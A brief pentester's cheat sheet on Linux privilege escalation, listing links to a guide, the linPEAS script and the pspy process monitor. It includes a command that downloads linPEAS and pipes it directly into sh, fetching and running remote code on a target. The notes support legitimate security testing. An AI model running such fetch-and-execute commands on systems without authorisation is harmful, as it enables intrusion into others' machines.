Linux PrivEsc

#Linux PrivEsc

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scriptssuite/master/linPEAS/linpeas.sh

#monitors for new processes eg cronjobs

https://github.com/DominicBreuker/pspy/releases

#download linpeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Last updated